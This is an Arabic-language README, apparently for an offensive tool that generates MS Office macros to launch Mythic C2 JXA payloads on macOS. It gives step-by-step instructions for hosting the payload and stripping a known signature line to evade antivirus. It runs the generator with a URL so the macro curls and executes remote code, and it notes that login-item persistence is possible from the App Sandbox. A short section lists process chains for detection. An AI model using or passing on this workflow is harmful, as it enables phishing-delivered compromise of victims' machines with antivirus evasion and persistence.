
نص برمجي Python3 لإنشاء ماكرو لتشغيل حمولة Mythic. المؤلف: سيدريك أوينز
نص برمجي بلغة Python3 لإنشاء ماكروات MS Office لإطلاق حمولات Mythic JXA.
يقوم هذا النص بإنشاء ماكرو Office يستخدم osascript لتنزيل وتنفيذ حمولة Mythic JXA .js.
الخطوات:
قم بإعداد خادم Mythic C2 وإنشاء حمولة "apfell" JXA (ملاحظة: يفترض هذا المُولّد أن الحمولة تستخدم http وليس https... إذا كنت تستخدم https بدلاً من ذلك، يمكنك فقط تعديل نص المُولّد ليجعل curl يستخدم https). قم بتنزيل تلك الحمولة على خادم Mythic.
قم بإزالة السطر الأول من مشغل Mythic JXA .js ("// Created by Cody Thomas - @its_a_feature_"). من المعروف أن بعض توقعات برامج مكافحة الفيروسات الثابتة تتحقق من هذا النص الثابت. قم باستضافة تلك الحمولة (مثال: ضع حمولة .js في مجلد واستخدم python -m SimpleHTTPServer للاستضافة).
قم بتشغيل مُولّد الماكرو هذا:
python3 jxa-macro.py -u [رابط حمولة .js المستضافة في الخطوة #2 أعلاه]
مثال: python3 jxa-macro.py -u http://192.168.1.1:8000/apfell2.js
سيتم إسقاط نص الماكرو إلى ملف في نفس الدليل باسم "macro.txt"
انسخ وألصق ذلك الماكرو في مستند MS Office.
الكشف:
يُنتج هذا الماكرو علاقات الأب-الابن التالية التي يمكن استخدامها للكشف:
منتج Office (مثل: Microsoft Word.app) ← /bin/sh
منتج Office (مثل: Microsoft Word.app) ← /bin/bash
منتج Office (مثل: Microsoft Word.app) ← /usr/bin/curl
ملاحظة: سيؤدي هذا إلى إطلاق حمولة JXA داخل App Sandbox. ومع ذلك، فإن Mythic لديه القدرة على إضافة ثبات عناصر تسجيل الدخول حتى من App Sandbox.